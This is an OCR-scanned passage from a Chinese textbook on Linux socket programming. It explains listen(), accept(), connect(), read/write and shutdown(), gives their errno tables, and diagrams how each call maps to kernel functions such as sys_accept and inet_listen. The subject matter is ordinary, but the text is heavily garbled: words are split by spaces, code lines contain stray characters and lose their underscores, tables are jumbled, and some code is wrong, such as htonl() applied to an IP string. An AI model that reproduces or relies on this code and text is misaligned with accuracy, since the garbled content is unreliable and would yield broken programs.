图 7.7 应 用 层 bind0 函 数 和 内 核 层 sys_bind0 函 数 之 间 的 联系 


应 用 层 的 函数 bind(sockfd,(struct sockaddr*)&my_addr, sizeof(struct sockaddr)) 调 用 系统 
函数 过 程 sys_bind(sockfd,(struct sockaddr*)&my_addr, sizeof(struct sockaddr))。sys_bind() 函 
数 首 先 调用 函数 sockfd_lookup_light() 来 获得 文件 描述 符 sockfd 对 应 的 内 核 struct sock 结构 
变量 ， 然 后 调用 函数 move_addr_to_kernel() 将 应 用 层 的 参数 my_addr 复制 进 内 核 ， 放 到 
address 变量 中 。 

内 核 的 sock 结构 是 在 调用 socketO 函 数 时 根据 协议 生成 的 ， 它 绑 定 了 不 同 协议 族 的 
bindO) 函 数 的 实现 方法 , 在 AF_INET 族 中 的 实现 函数 为 inet_ bind0， 即 会 调用 AF_INET 族 
的 bindO) 函 数 进行 绑 定 处 理 。 


7.2.4 监听 本 地 端口 listen 


在 7.2.1 节 中 简单 介绍 了 服务 器 模式 的 方式 ， 服 务 器 模式 中 有 listen() 和 accept() 两 个 函 
数 ， 而 客户 端 则 不 需要 这 两 个 函数 。 函 数 listen() 用 来 初始 化 服务 器 可 连接 队列 ， 服 务 器 处 
理 客 户 端 连接 请 求 的 时 候 是 顺序 处 理 的 ， 同 一 时 间 仅 能 处 理 一 个 客户 端 连接 。 当 多 个 客户 
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端的 连接 请 求 同 时 到 来 的 时 候 ， 服 务 器 并 不 是 同时 处 理 ， 而 是 将 不 能 处 理 的 客户 端 连接 请 
求 放 到 等 待 队 列 中 ， 这 个 队列 的 长 度 由 listen() 函 数 来 定义 。 
1. listen() 函 数 介绍 
listen(0) 函 数 的 原型 如 下 ， 其 中 的 backlog 表示 等 待 队列 的 长 度 。 


#include <sys/socket.h> 
int listen(int sockfd, int backlog); 


当 listen() 函 数 成 功 运行 时 ， 返 回 值 为 0， 当 运行 失败 时 ， 它 的 返回 值 为 -1， 并 且 设 置 
errno 值 ， 错 误 代 码 的 含义 如 表 7.5 所 示 。 
表 7.5 listen() 函 数 的 errno 值 及 含义 


值 含义 
EADDRINUSE 另 一 个 socket 已 经 在 同一 端口 侦 听 
EBADF 参数 sockfd 不 是 合法 的 描述 符 
ENOTSOCK 参数 sockfd 不 是 代表 socket 的 文件 描述 符 
EOPNOTSUPP socket 不 支持 listen 操作 


在 接受 一 个 连接 之 前 ， 需 要 用 listen() 函 数 来 侦 听 端口 ，listen() 函 数 中 参数 backlog 的 
参数 表示 在 accept() 函 数 处 理 之 前 在 等 待 队列 中 的 客户 端的 长 度 , 如 果 超 过 这 个 长 度 , 客户 
端 会 返回 一 个 ECONNREFUSED 错误 。 

listen() 函 数 仅 对 类 型 为 SOCK_STREAM 或 者 SOCK_SEQPACKET 的 协议 有 效 , 例如 ， 
如 果 对 一 个 SOCK_DGRAM 的 协议 使 用 函数 listen()， 将 会 出 现 错误 errno 应 该 为 值 
EOPNOTSUPP， 表 示 此 socket 不 支持 函数 listen() 操 作 。 大 多 数 系统 的 设置 为 20， 可 以 将 
其 设置 修改 为 5 或 者 10， 根 据 系统 可 承受 负载 或 者 应 用 程序 的 需求 来 确定 。 


2. listen() 函 数 的 例子 


下 面 是 一 个 listen() 函 数 的 实例 代码 , 在 成 功 进行 socket() 函 数 初始 化 和 bind() 函 数 端 口 
之 后 ， 设 置 listen() 函 数 队列 的 长 度 为 5。 


01 #define MYPORT 3490 /* 端 口 地 址 */ 

02 int 

03 main(int argc, char *argv[]) 

04 { 

05 int sockfd; /* 套 接 字 文件 描述 符 变量 */ 

06 struct sockaddr in my addr; /* 以 太 网 套 接 字 地 址 结构 */ 

07 

08 sockfd = socket (AF INET, SOCK STREAM, 0); /* 初 始 化 socket*/ 
09 if (sockfd == -1) { /* 检 查 是 否 正 常 初始 化 socket*/ 
10 perror ("socket"); 

下 于 exit (EXIT_ FAILURE); 

12 1 

my_addr.sin family = AF INET; /* 地 址 结构 的 协议 族 */ 

14 my_addr.sin port = htons (MYPORT); /* 地 址 结构 的 端口 地 址 , 网 络 字 节 序 */ 
iu my addr.sin addr.s addr = inet addr ("192.168.1.150") 


/*IP, 将 字符 串 的 IP 地 址 转化 为 网 络 字 节 序 */ 
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bzero(& (my addr.sin zero), 8); /* 将 my_addr.sin zero 置 0*/ 
if (bind(sockfd, (struct sockaddr *) gmy _ addr, 
sizeof (struct sockaddr)) == -1) { /* 判 断 是 否 绑 定 成 功 */ 
perror ("bind"); /* 打 印 错误 信息 */ 
exit (EXIT FAILURE); /* 退 出 程序 */ 
if (listen(sockfd, /* 进 行 侦 听 队列 长 度 的 绑 定 */ 
5)) == -1) { /* 判 断 是 否 1isten 成 功 */ 
perror ("listen"); /* 打 印 错误 信息 */ 
exit (EXIT FAILURE); /* 退 出 程序 */ 
} 


SE /* 接 收 数据 、 发 送 数据 和 数据 的 处 理 过 程 */ 
close (sockfd) ; /* 关 闭 套 接 字 */ 


第 01 行 定义 了 地 址 结构 中 需要 绑 定 地 址 的 端口 值 。 

第 05 行 和 第 06 行 初始 化 套 接 字 文件 描述 符 和 以 太 网 地 址 结构 的 变量 。 

第 08 行 建 立 一 个 AF_INET 类 型 的 流 式 套 接 字 。 

第 09 一 12 行 如 果 套 接 字 初 始 化 失败 的 时 候 的 处 理 措施 。 

第 13 行 设置 地 址 结构 的 协议 族 为 AF_INET。 

第 14 行 设置 地 址 结构 的 端口 地 址 为 MYPORT， 由 于 MYPORT 为 主机 字 节 序 , 使 
用 函数 htons0 进 行 字 节 序 转换 。 

第 15 行 设置 地 址 结构 的 IP 地 址 , 使 用 函数 inet_addr() 将 字符 串 192.168.1.150 转换 
为 二 进 制 网 络 字 节 序 的 卫 地 址 值 。 

第 16 行将 地 址 结构 的 sin_zero 域 设置 为 0。 

第 17 行将 地 址 结构 与 套 接 字 文 件 描述 符 进行 绑 定 。 

第 22 行 设置 套 接 字 sockfd 的 侦 听 队列 长 度 为 5。 

第 27 行 接收 数据 、 发 送 数据 和 进行 数据 处 理 的 过 程 。 

第 28 行 在 数据 处 理 过 程 结束 后 ， 关 闭 套 接 字 。 


.应 用 层 listen() 函 数 和 内 核 函数 之 间 的 关系 


应 用 层 listen() 函 数 和 内 核 层 listen() 函 数 的 关系 如 图 7.8 所 示 ， 应 用 层 的 listen() 函 数 对 
应 于 系统 调用 sys_listen() 函 数 。sys_listen() 函 数 首先 调用 sockfd_lookup_light() 函 数 获得 
sockfd 对 应 的 内 核 结 构 struct socket， 查 看 用 户 的 backlog 设置 值 是 否 过 大 ， 如 果 过 大 则 设 
置 为 系统 默认 最 大 设置 。 然 后 调用 抽象 的 listen() 函 数 ， 这 里 指 的 是 AF_INET 的 listen() 函 
数 和 inet_listen0 函 数 。 

inet_listen() 函 数 首先 判断 是 否 合法 的 协议 族 和 协议 类 型 ， 再 更 新 socket 的 状态 值 为 
TCP_LISTEN， 然 后 为 客户 端的 等 待 队 列 申请 空间 并 设 定 侦 听 端口 。 


下 2 


接受 一 个 网 络 请 求 accept() 函 数 


当 一 个 客户 端的 连接 请 求 到 达 服 务 器 主机 侦 听 的 端口 时 ， 此 时 客户 端的 连接 会 在 队列 


中 等 待 ， 直 到 使 用 服务 器 处 理 接收 请 求 。 
函数 accept() 成 功 执行 后 , 会 返回 一 个 新 的 套 接 字 文 件 描述 符 来 表示 客户 端的 连接 , 客 
户 端 连接 的 信息 可 以 通过 这 个 新 描述 符 来 获得 。 因 此 当 服 务 器 成 功 处 理 客户 端的 请 求 连接 
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listen() 函 数 将 sockfd 对 应 的 socket 
的 侦 听 等 待 队列 设置 为 5 


| listen(sockfd, 5); 应 用 层 


丙 & ed | isten0 函 数 对 应 的 系统 调用 函 
Ea 数 sys_listen() 


long sys_listen(sockfd, 5) 


[函数 sockfd_lookup_light() 获 得 
| 文件 描述 符 sockfd 对 应 的 内 核 


结构 struct sock 的 指针 


struct socket *sock; 
| int err, fput_needed; 

sock = sockfd_lookup_light(sockfd, &err, 
&fput_needed); 


调整 用 户 最 大 侦 听 队列 
数 的 不 合法 设置 
somaxconn = sock_net(sock->sk)- 
Zcore.sysct]_somaxconn; 
if ((unsigned)backlog > somaxconn) AF INET 族 


backlog=somaxconn; | | 1 


int inet_listen(struct socket 
4 *sock, int backlog) 
err = sock->ops->listen(sock, 5); 


调用 应 用 层 函数 协议 族 AF_INET 的 
listen0 对 应 协议 族 的 listen(0) 函 数 实现 为 
listen() 函 数 实现 inet_listen() 


图 7.8 应 用 层 listen() 函 数 和 内 核 层 sys_listen() 函 数 的 关系 图 


后 ， 会 有 两 个 文件 描述 符 ， 老 的 文件 描述 符 表示 正在 监听 的 socket， 新 产生 的 文件 描述 符 
表示 客户 端的 连接 ， 函 数 send() 和 recv() 通 过 新 的 文件 描述 符 进行 数据 收发 。 


1. accept() 函 数 介绍 
accept() 函 数 的 原型 如 下 : 


#include <sys/types.h> 

#include <sys/socket.h> 

int accept (int sockfd, struct sockaddr *addr, socklen t *addrlen); 

通过 accept() 函 数 可 以 得 到 成 功 连接 客户 端的 IP 地 址 、 端 口 和 协议 族 等 信息 ， 这 个 信 
息 是 通过 参数 addr 获得 的 。 当 accept() 函 数 返回 的 时 候 , 会 将 客户 端的 信息 存储 在 参数 addr 
中 。 参 数 addrlen 表示 第 2 个 参数 (addr) 所 指 内 容 的 长 度 , 可 以 使 用 sizeoflstruct sockaddr in) 
来 获得 。 需 要 注意 的 是 ， 在 accept 中 addrlen 参数 是 一 个 指针 而 不 是 结构 ，accept() 函 数 将 
这 个 指针 传 给 TCP/IP 协议 栈 。 

accpet() 函 数 的 返回 值 是 新 连接 的 客户 端 套 接 字 文 件 描述 符 , 与 客户 端 之 间 的 通信 是 通 
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过 accept0 函 数 返回 的 新 套 接 字 文件 描述 符 来 进行 的 , 而 不 是 通过 建立 套 接 字 时 的 文件 描述 
符 ， 这 是 在 程序 设计 的 时 候 需 要 注意 的 地 方 。 如 果 accept() 函 数 发 生 错误 ，accept0) 函 数 会 
返回 -1。 通 过 errno 可 以 得 到 错误 值 ， 含 义 在 表 7.6 中 进行 介绍 。 


表 7.6 accept 的 errmno 值 及 含义 


高: 学 
此 socket 使 用 了 非 阻塞 模式 ， 当 前 情况 下 没有 可 接受 的 连接 
描述 符 非法 
连接 取消 


值 
EAGAIN/EWOULDBLOCK 
EBADF 

ECONNABORTED 


EINTR 信号 在 合法 连接 到 来 之 前 打 断 了 accept 的 系统 调用 
EINVAL socket 没有 侦 听 连接 或 者 地 址 长 度 不 合法 

EMFILE 每 个 进程 允许 打开 的 文件 描述 符 数量 最 大 值 已 经 到 达 
ENFILE 达到 系统 允许 打开 文件 的 总 数量 


文件 描述 符 是 一 个 文件 ， 不 是 socket 
引用 的 socket 不 是 流 类 型 SOCK_STREAM 
参数 addr 不 可 写 


ENOTSOCK 
EOPNOTSUPP 
EFAULT 
ENOBUFS/ENOMEM 
EPROTO 


革 1 忆 


日 天 


协议 名 
防火 墙 不 允许 连接 


2. accept() 函 数 的 例子 
下 面 是 一 个 简单 的 使 用 accept(O) 函 数 的 例子 。 这 个 例子 先 建立 一 个 流 式 套 接 字 


套 接 字 进 行 地 址 绑 定 ， 当 绑 定 成 功 后 ， 初 始 化 侦 听 队列 的 长 度 ， 然 后 等 待 客 户 端的 连接 


01 int main(int argc, char *argv[]) 


QE 
03 int sockfd, client fd; /*sockfd 为 侦 听 的 socket, client_ 
fd 为 连接 方 的 socket 值 */ 
04 struct sockaddr in my addr; /* 本 地 地 址 信息 */ 
05 struct sockaddr in client addr; /* 客 户 端 连接 的 地 址 信息 */ 
06 int addr length; /*int 类 型 变量 ,用 于 保存 网 络 地 址 长 度量 */ 
07 Sockfd = socket (AF INET, SOCK STREAM, 0); 
/* 初 始 化 一 个 IPv4 族 的 流 式 连接 */ 
08 if (sockfd == -1) { /* 检 查 是 否 正 常 初始 化 socket*/ 
09 perror ("socket"); /* 打 印 错误 信息 */ 
10 exit (EXIT FAILURE); /* 退 出 程序 */ 
11 } 
12 my_addr.sin family = AF INET; /* 协 议 族 为 IPv4, 主机 字 节 序 */ 
13 my_addr.sin port = htons (MYPORT) ;  /* 端 口 , 短 整 形 , 网 络 字 节 序 */ 
14 my_addr.sin addr.s addr = INADDR ANY; /* 自 动 IP 地 址 获得 */ 
15 bzero(& (my addr.sin zero), 8); /# 置 0*/ 
16 if (bind(sockfd, (struct sockaddr *) &my_addr， /* 绑 定 端口 地 址 */ 
3 sizeof(struct sockaddr)) == -1) { /* 判 断 是 否 绑 定 成 功 */ 
18 perror ("bind"); /* 打 印 错误 信息 */ 
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19 exit (EXIT FAILURE); /* 退 出 程序 */ 
20 } 
21 if (listen(sockfd, /* 设 置 侦 听 队 列 长 度 为 BACKLOG=10*/ 
2 BACKLOG)) == -1) { /* 判 断 是 否 1isten 成 功 */ 
23 perror ("listen"); /* 打 印 错误 信息 */ 
24 exit (EXIT FAILURE); /* 退 出 程序 */ 
25 } 
26 addr length = sizeof(struct sockaddr in); /* 地 址 长 度 */ 
py client fd = accept(sockfd, & client addr, & addr length); 
/* 等 待 客户 端 连 接 , 地 址 在 client_addr 中 */ 
28 if(client fd == -1){ /*accept 出 错 */ 
29 perror ("accept") /* 打 印 错误 信息 */ 
30 exit (EXIT FAILURE); /* 退 出 程序 */ 
Eh } 
32 
33 二 /* 处 理 客户 端 连接 过 程 */ 
34 close(client fd); /* 关 闭 客户 端 连接 */ 
35 > /* 其 他 过 程 #/ 
36 close (sockfd) ; /* 关 闭 服 务 器 端 连 接 */ 
3 
口 第 03 行 定 义 了 服务 器 套 接 字 变量 sockfd 和 客户 端 连接 时 新 产生 的 套 接 字 变量 
client fd。 


口 第 04 行 和 第 05 行 定义 本 地 地 址 结构 变量 my_addr 和 客户 端 连接 时 产生 的 地 址 结 
构 变 量 client_addr。 

口 第 06 行 定 义 地 址 结构 的 长 度 变量 addr_ length， 在 accept() 函 数 调用 的 时 候 用 于 传 

入 地 址 结构 的 长 度 。 

第 07 一 11 行 初始 化 一 个 IPv4 族 的 流 式 连接 并 进行 错误 处 理 。 

第 12 一 14 行进 行 服务 器 地 址 结构 的 初始 化 ， 其 中 本 地 IP 地 址 设置 为 

INADDR_ANY， 表 示 任 意 的 本 地 IP 地 址 。 

口 第 16 行 将 地 址 结构 的 sin_zero 域 设置 为 0。 

口 第 16 一 20 行将 服务 器 地 址 结构 与 套 接 字 进 行 绑 定 并 进行 错误 处 理 。 

口 第 21 一 25 行 设置 侦 听 队列 的 长 度 并 进行 错误 处 理 。 

口 第 26 行 获取 地 址 结构 的 长 度 。 

口 第 27 一 31 行 接收 客户 端的 连接 并 进行 错误 处 理 。 先 等 待 客户 端的 连接 ， 客 户 端 连 

接 成 功 后 ，client fa 中 为 客户 端的 套 接 字 地 址 。 

第 33 行 省 略 的 代码 是 通过 套 接 字 文 件 描述 符 client_fd 处 理 客户 端的 数据 传输 。 

第 34 行 在 对 客户 端的 数据 处 理 过程 结 束 后 ， 关 闭 客户 端 套 接 字 。 

第 35 行 省 略 的 代码 是 使 服务 器 的 其 他 过 程 ， 例 如 接收 新 的 客户 端 连 接 等 操作 。 

第 36 行当 服务 器 需要 关闭 的 时 候 ， 使 用 close(sockfd) 进 行 服务 器 套 接 字 的 关闭 。 


. 应 用 层 accept() 函 数 和 内 核 函数 之 间 的 关系 


应 用 层 的 accept() 函 数 和 内 核 层 的 accept() 函 数 的 关系 如 图 7.9 所 示 。 应 用 层 的 accept0 
函数 对 应 内 核 层 的 sys_accept0 〇 函数 系统 调用 函数 。 函 数 sys_accept() 查 找 文件 描述 符 对 应 
的 内 核 socket 结构 、 申 请 一 个 用 于 保存 客户 端 连接 的 新 的 内 核 socket 结构 、 获 得 客户 端的 
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地 址 信息 、 将 连接 的 客户 端 地 址 信息 复制 到 应 用 层 的 用 户 、 返 回 连接 客户 端 socket 对 应 的 
文件 描述 符 。 


[acceptO 函 数 接收 到 sockfd 
| 对 应 的 socket 的 连接 请 求 


client fd = accept(sockfd, & 
client_addr, & addr length); 应 用 层 


内 核 层 [aceept0) 函 数 对 应 的 系统 


调用 函数 sys_accept() 
long sys_accept(int fd, struct sockaddr a 
_user *upeer_sockaddr, 函数 sockfd_lookup_light() 获 得 文件 描述 符 


int _ user *upeer_addrlen) sockfd 对 应 的 内 核 结构 struct sock 的 指针 


struct socket *sock; int err, fput_needed; 


sock = sockfd_lookup_light(sockfd, &err, 1. 申请 一 个 结构 struct socket 空 间 
&fput_needed); 2. 按照 应 用 层 sockfd 对 应 的 结构 设置 新 的 结构 
1 3. 产 生 对 应 的 文件 描述 符 


struct socket *newsock = sock_alloc(); 
newsock->type = sock->type; 接受 客户 端 连接 请 求 
newsock->ops = sock->ops; 

newfd = sock_alloc fd(&newfile); 


[协议 族 AF _INET 的 accept() 
[函数 实现 为 inet_accept() 


err = sock->ops->accept(sock, newsock, sock- 
>file->f flags); 


AF_INET 族 
| int inet_accept(struct socket *sock, 


人 
newsock->ops->getname(newsock, (struct struct socket *newsock, int flags) 


sockaddr *)address, &len, 2) <0) i 
int inet_getname(struct socket *sock, 


struct sockaddr *uaddr, int 
*uaddr_len, int peer) 


move_addr to_user(address\len, 
upeer_sockaddr,upeer_addrleM); 


| 协议 族 AF_INET 的 getname() 
| 函数 实现 为 inet |_getname() 


将 内 核 空间 的 地 址 信 | [获得 newsock 的 客 
息 复制 到 用 户 空间 | | 户 端 连接 信息 


图 7.9 应 用 层 accept0 函 数 和 内 核 层 sys_accept() 函 数 的 关系 图 


函数 sys_accept() 调 用 函数 sockfd_lookup_light() 查 找到 文件 描述 符 对 应 的 内 核 socket 
结构 后 ,然后 会 申请 一 块 内 存 用 于 保存 连接 成 功 的 客户 端的 状态 。socket 结构 的 一 些 参 数 ， 
如 类 型 type、 操 作 方式 ops 等 会 继承 服务 器 原来 的 值 , 假如 原来 服务 器 的 类 型 为 AF_INET， 
则 其 操作 模式 仍然 是 af_inet.c 文件 中 的 各 个 函数 。 然 后 会 查找 文件 描述 符 表 ， 获 得 一 个 新 
结构 对 应 的 文件 描述 符 。 

accept() 函 数 的 实际 调用 根据 协议 族 的 不 同 而 不 同 , 即 函 数 指针 sock->ops->accept 要 由 
socket() 函 数 初始 化 时 的 协议 族 而 确定 。 当 为 AF_INET 时 ， 此 函数 指针 对 应 于 af inet.c 文 
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件 中 的 inet_accept() 函 数 。 

当 客 户 端 连接 成 功 后 ， 内 核准 备 连接 的 客户 端的 相关 信息 ,包含 客 户 端的 人 P 地 址 、 客 
户 端 的 端口 等 信息 ， 协 议 族 的 值 继承 原 服务 器 的 值 。 在 成 功 获得 信息 之 后 会 调用 
move_addr_to_user() 函 数 将 信息 复制 到 应 用 层 空 间 ， 具 体 的 地 址 由 用 户 传 入 的 参数 来 确定 。 
7.2.6 ”连接 目标 网 络 服 务 器 connect() 函 数 


客户 端 在 建立 套 接 字 之 后 ， 不 需要 进行 地 址 绑 定 就 可 以 直接 连接 服务 器 。 连 接 服务 器 
的 函数 为 connectD)， 此 函数 连接 指定 参数 的 服务 器 ， 例 如 耳 地 址 、 端 口 等 。 


1. connect() 函 数 介 绍 
connect() 函 数 的 原型 如 下 ， 其 中 的 参数 sockfd 是 建立 套 接 字 时 返回 的 套 接 字 文件 描述 


符 ， 它 是 由 系统 调用 socket() 函 数 返 回 的。 参数 serv_addr， 是 


-个 指向 数据 结构 sockaddr 


的 指针 ， 其 中 包括 客户 端 需要 连接 的 服务 器 的 目的 端口 和 IP 地 址 ， 以 及 协议 类 型 。 参 数 
addrlen 表示 第 二 个 参数 内 容 的 大 小 , 可 以 使 用 sizeofstruct sockaddr) 而 获得 ， 与 bind() 函 数 
不 同 ， 这 个 参数 是 一 个 整 型 的 变量 而 不 是 指针 。 

#include <sys/types .h> 


#include <sys/socket.h> 
int connect (int sockfd, struct sockaddr *#, int addrlen); 


connect0) 函 数 的 返回 值 在 成 功 时 为 0， 当 发 生 错 误 的 时 候 返 回 -1， 可 以 查看 errno 获得 


错误 的 原因 。 错 误 值 


含义 在 表 7.7 中 列 出 。 
表 7.7 connect() 函 数 的 errno 值 及 含义 


值 含义 
A a 族 协 议 中 ， 使 用 路 径 名 作为 标识 。EACCES 表示 目录 不 可 写 或 者 不 
EACCES/EPERM | 用 户 没有 设置 广播 标志 而 连接 广播 地 址 或 者 连接 请 求 被 防火 墙 限制 
EADDRINUSE 本 地 地 址 已 经 在 使 用 
EAFNOSUPPORT | 参数 serv_addr 的 域 sa_family 不 正确 
EAGAIN 本 地 端口 不 足 
EALREADY socket 是 非 阻塞 类 型 并 且 前 面 的 连接 没有 返回 
EBADF 文件 描述 符 不 是 合法 的 值 
ECONNREFUSED | 连接 的 主机 地 址 没有 侦 听 
EFAULT socket 结构 地 址 超出 用 户 空间 
EINPROGRESS socket 是 非 阻塞 模式 ， 而 连接 不 能 立刻 返回 
EINTR 函数 被 信号 中 断 
EISCONN socket 已 经 连接 
ENETUNREACH | 网 络 不 可 达 
ENOTSOCK 文件 描述 符 不 是 一 个 socket 
ETIMEDOUT 连接 超时 


和 


2. 
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connect() 函 数 的 例子 


下 面 是 connect() 函 数 的 使 用 实例 代码 ， 与 服务 器 的 代码 类 似 ， 先 建立 一 个 套 接 字 文 件 


描述 符 , 当成 功 建立 描述 符 后 , 将 需要 连接 的 服务 器 IP 地 址 和 端口 填充 到 一 个 地 址 结构 中 ， 
connect() 函 数 连 接 到 地 址 结构 所 指定 的 服务 器 上 。 
01 #define DEST IP "132.241.5.10" /* 服 务 器 的 IP 地 址 */ 
02 #define DEST PORT 23 /* 服 务 器 端口 */ 
03 int main(int argc, char *argv[]) 
04 { 
05 int ret = 0; 
06 int sockfd; /*sockfd 为 连接 的 socket*/ 
07 struct sockaddr in server; /* 服 务 器 地 址 的 信息 */ 
08 Sockfd = socket (AF_ INET, SOCK_STREAM, 0); 
/* 初 始 化 一 个 IPv4 族 的 流 式 连接 */ 
09 if (sockfd == -1) { /* 检 查 是 否 正常 初始 化 socket*/ 
10 perror ("socket"); 
11 exit (EXIT FAILURE); 
1 } 
到 server.sin family = AF_INET; /* 协 议 族 为 TPv4, 主机 字 节 序 */ 
14 server.sin Port = htons (DEST PORT) /* 端 口 , 短 整 型 , 网 络 字 节 序 */ 
15 server.sin addr.s_addr = htonl (DEST_IP);  ”/* 服 务 器 的 IP 地 址 */ 
16 bzero(& (server.sin zero), 8); /* 保 留 字段 置 0*/ 
bl 
18 ret = connect(sockfd, (struct sockaddr *)& server, sizeof (struct 
sockaddr) ) ; /* 连 接 服务 器 #/ 
19 Sa /* 接 收 或 者 发 送 数据 */ 
20 close(sockfd); 
21. 站 
口 第 01 行 和 第 02 行 分 别 定义 了 客户 端 连接 的 服务 器 IP 地 址 和 服务 器 的 侦 听 端口 。 
口 第 08 一 12 行 建立 一 个 AF_INET 类 型 的 流 式 套 接 字 并 进行 错误 处 理 。 
口 第 13 行 和 第 16 行 对 以 太 网 地 址 结构 的 变量 的 参数 进行 赋值 。 
口 第 18 行 连接 服务 器 。 
口 第 19 行 省 略 部 分 的 代码 表示 接收 数据 、 发 送 数据 和 进行 数据 处 理 的 过 程 。 
口 第 20 行 在 数据 处 理 过 程 结束 后 ， 关 闭 套 接 字 。 
3. 应 用 层 connect() 函 数 和 内 核 函 数 之 间 的 关系 
应 用 层 connect() 函 数 和 内 核 层 的 connect() 函 数 关系 如 图 7.10 所 示 。 内 核 层 的 connect() 


函数 比较 简单 ， 主 要 进行 不 同 的 协议 映射 的 时 候 要 根据 协议 的 类 型 进行 选择 ， 例 如 数据 报 
和 流 式 数据 的 connectO) 函 数 不 同 ， 流 式 的 回调 函数 为 inet_stream_connect()， 数 据 报 的 回调 


Ti 


inet_dgram connect()。 


写 入 数据 函数 write() 


如 图 7.10 所 示 ， 当 服务 器 端 在 接收 到 一 个 客户 端的 连接 后 ， 可 以 通过 套 接 字 描述 符 进 
行 数据 的 写 入 操作 。 对 套 接 字 进行 写 入 的 形式 和 过 程 与 普通 文件 的 操作 方式 一 致 ， 内 核 会 


。200。 
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| connect0 函数 连接 server 指 定 的 地 址 和 端口 


connect(sockfd, (struct sockaddr *)& server, sizeoffstruct sockaddr)); 


[connect0 函 数 对 应 的 系统 
内 核 导 Be | 调 用 函数 wys comnect0) 


long sys_connect(int fd, struct sockaddr 一 一 
_user *uservaddr, int addrlen) 函数 sockfd_ lookup_lightO 获 得 

文件 描述 符 sockfd 对 应 的 内 核 
结构 struct sock 的 指针 


旦 
型 
疯 


struct socket *sock; int err, fput_needed; 
sock = sockfd_lookup_light(sockfd, &err, 连接 服务 器 
&fput_needed); 


int inet_stream _ connect(struct 
socket *sock, struct sockaddr 
*uaddr, int addr_len, int flags) 


err = sock->ops->connect(sock, (struct sockaddr*) 
address, addrlen, sock->file->f flags); 


协议 族 AF_INET 的 | 
调用 应 用 层 函 数 connect() 对 应 connect0 函 数 实 现 为 
协议 族 的 connect() 函 数 实现 inet connect) _ | 


图 7.10 应 用 层 connect0 函 数 和 内 核 层 sys_connect0 函 数 的 关系 图 


根据 文件 描述 符 的 值 来 查找 所 对 应 的 属性 ， 当 为 套 接 字 的 时 候 , 会 调用 相对 应 的 内 核 函 数 。 
下 面 是 一 个 向 套 接 字 文 件 描述 符 中 写 入 数据 的 例子 , 将 缓冲 区 data 的 数据 全 部 写 入 套 
接 字 文件 描述 符 s 中 ， 返 回 值 为 成 功 写 入 的 数据 长 度 。 


int size ; 
char data[1024]; 
size = write(s, data, 1024); 


7.2.8” 读 取 数 据 函 数 read() 


与 写 入 数据 类 似 ， 使 用 read0 函 数 可 以 从 套 接 字 描 述 符 中 读 取 数据 。 当 然 ， 在 读 取 数 
据 之 前 , 必须 建立 套 接 字 并 连接 。 读 取 数据 的 方式 如 下 所 示 , 从 套 接 字 描 述 符 s 中 读 取 1024 
个 字 节 ， 放 入 缓冲 区 data 中 ，size 变量 的 值 为 成 功 读 取 的 数据 大 小 。 


int size $ 
char data[1024]; 
size = readl(s, data, 1024); 


i 
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7.2.9 关闭 套 接 字 函 数 


关闭 socket 连接 可 以 使 用 close() 函 数 实现 , 函数 的 作用 是 关闭 已 经 打开 的 socket 连接 ， 
内 核 会 释放 相关 的 资源 ， 关 闭 套 接 字 之 后 就 不 能 再 使 用 这 个 套 接 字 文 件 描述 符 进行 读 写 操 
作 了 。 函 数 原型 在 第 3 章 中 已 经 介绍 过 。 

函数 shutdown() 可 以 使 用 更 多 方式 来 关闭 连接 ， 人 允许 单方 向 切断 通信 或 者 切断 双方 的 
通信 。 函 数 原型 如 下 ， 第 一 个 参数 s 是 切断 通信 的 套 接口 文件 描述 符 ， 第 二 个 参数 how 表 
示 切 断 的 方式 。 

#include <sys/socket.h> 

int shutdown (int s, int how); 

函数 shutdown() 用 于 关闭 双向 连接 的 一 部 分 ， 具 体 的 关闭 行为 方式 通过 参数 的 how 设 
置 来 实现 。 可 以 为 如 下 值 。 

口 SHUT_RD: 值 为 0， 表 示 切 断 读 ， 之 后 不 能 使 用 此 文件 描述 符 进行 读 操作 。 

口 SHUT_WR: 值 为 1， 表示 切断 写 ， 之 后 不 能 使 用 此 文件 描述 符 进行 写 操作 。 

口 SHUT_RDWR: 值 为 2, 表示 切断 读 写 , 之 后 不 能 使 用 此 文件 描述 符 进行 读 写 操作 ， 

与 close() 函 数 功 能 相同 。 

函数 shutdown() 如 果 调 用 成 功 则 返回 0， 如 果 失 败 则 返回 -1， 通 过 errno 可 以 获得 错误 

的 具体 信息 ， 错 误 值 含义 参见 表 7.8。 
表 7.8 shutdown 的 erro 值 及 含义 


值 含义 
EBADF 文件 描述 符 不 是 合法 的 值 
ENOTCONN socket 没有 连接 
ENOTSOCK s 是 一 个 文件 ， 不 是 socket 


7.3 ”服务 器 /客户 端的 简单 例子 


前 面 儿 节 对 网 络 程序 设计 的 函数 进行 了 介绍 , 本 节 将 介绍 一 个 简单 的 基于 TCP 协议 的 
服务 器 /客户 端的 例子 。 通 过 本 例 中 代码 和 程序 构建 过 程 ， 读 者 能 够 对 基于 TCP 协议 的 服 
务 器 、 客 户 端 程序 设计 方法 和 过 程 有 基本 的 了 解 ， 能 够 进一步 编写 自己 的 程序 。 

7.3.1 例子 功能 描述 


例子 程序 分 为 服务 器 端 和 客户 端 ， 客 户 端 连接 服务 器 后 从 标准 输入 读 取 输 入 的 字符 
串 ， 发 送 给 服务 器 ; 服务 器 接收 到 字符 串 后 ， 发 送 接收 到 的 总 字符 串 个 数 给 客户 端 ， 客 户 
端 将 接收 到 的 服务 器 的 信息 打印 到 标准 输出 。 程 序 框架 如 图 7.11 所 示 。 


7.3.2 ”服务 器 网 络 程 序 


程序 的 代码 如 下 ， 程 序 按照 网 络 流程 建立 套 接 字 、 初 始 化 绑 定 网 络 地 址 、 将 套 接 字 与 
网 络 地 址 绑 定 、 设 置 侦 听 队列 长 度 、 接 收 客户 端 连接 、 收 发 数据 、 关 闭 套 接 字 进行 编写 。 


a 
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Tead write read 


标准 输入 


标准 输出 


write read write 


图 7.11 简单 的 服务 器 /客户 端 框架 


1. 初始 化 工作 
包含 需要 的 头 文件 、 定 义 侦 听 端口 及 侦 听 队列 的 长 度 。 


01 #include <stdio.h> 

02 #include <stdlib.h> 

03 #include <strings.h> 

04 #include <sys/types.h> 

05 #include <sys/socket.h> 

06 #include <arpa/inet.h> 

07 #include <unistd.h> 

08 #define PORT 8888 /* 侦 昕 端口 地 址 */ 
09 #define BACKLOG 2 /* 侦 听 队 列 长 度 */ 
10 int main(int argc, char *argv[]) 

Lio 

2 int ss,sc; /*ss 为 服务 器 的 socket 描述 符 , sc 为 客户 端的 socket 描述 符 */ 
13 struct sockaddr in server addr; /* 服 务 器 地 址 结构 */ 
14 struct sockaddr in client addr; /* 客 户 端 地 址 结构 */ 
5 int err; /* 返 回 值 */ 

